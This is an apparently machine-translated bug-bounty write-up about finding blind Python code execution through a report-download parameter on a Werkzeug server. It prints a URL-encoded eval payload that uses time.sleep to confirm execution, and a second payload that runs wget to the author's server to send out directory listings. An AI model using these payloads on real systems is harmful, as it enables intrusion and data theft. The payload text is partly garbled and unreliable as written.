Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you the RCE mining analysis on how to analyze the twists and turns. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

A brief record of this loophole, there is no special way, is to be careful with fuzz

The target application has a function to download files, and you can download reports in csv format.

The results of bag capture are as follows:

There seems to be no problem, but the Werkzaug and python in the response have attracted my attention. Those who don't know Werkzaug can take a look.

I tried to replace the value of the params parameter with some other payload, and it all reported an error, which seemed to be all right. I was ready not to look at this point, but when I used the null parameter, the server returned a 500error.

This shows that this parameter will still affect the operation of the server (of course, not necessarily, this is just my guess), in order to further determine, I will start the parameter fuzz

Finally, I sorted out all kinds of error reports and found that all the payload related to python reported 500errors.

It looks promising, so I encode the payload of python rce with url.

Eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

Successfully executed, the server experienced a delay:

Since the data will not be echoed, we have no choice but to use other methods to bring out the data. do you remember the content of the last article?

If you didn't read the last article, go back and take a look.

Construct payload:

Eval (compile ("" for x in range (1):\ n import os\ nos.popen (r'wget http://axin.com:8000/shell.php?cmd="$(ls-la) ") read ()",', 'single')

Then deploy a shell.php file on our server axin.com with the following contents:

Send payload and view the contents of the POC.txt file:

Nice is amazing, of course, you can also play shell directly.

The above is the editor for you to share how to analyze the twists and turns of the RCE mining analysis, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.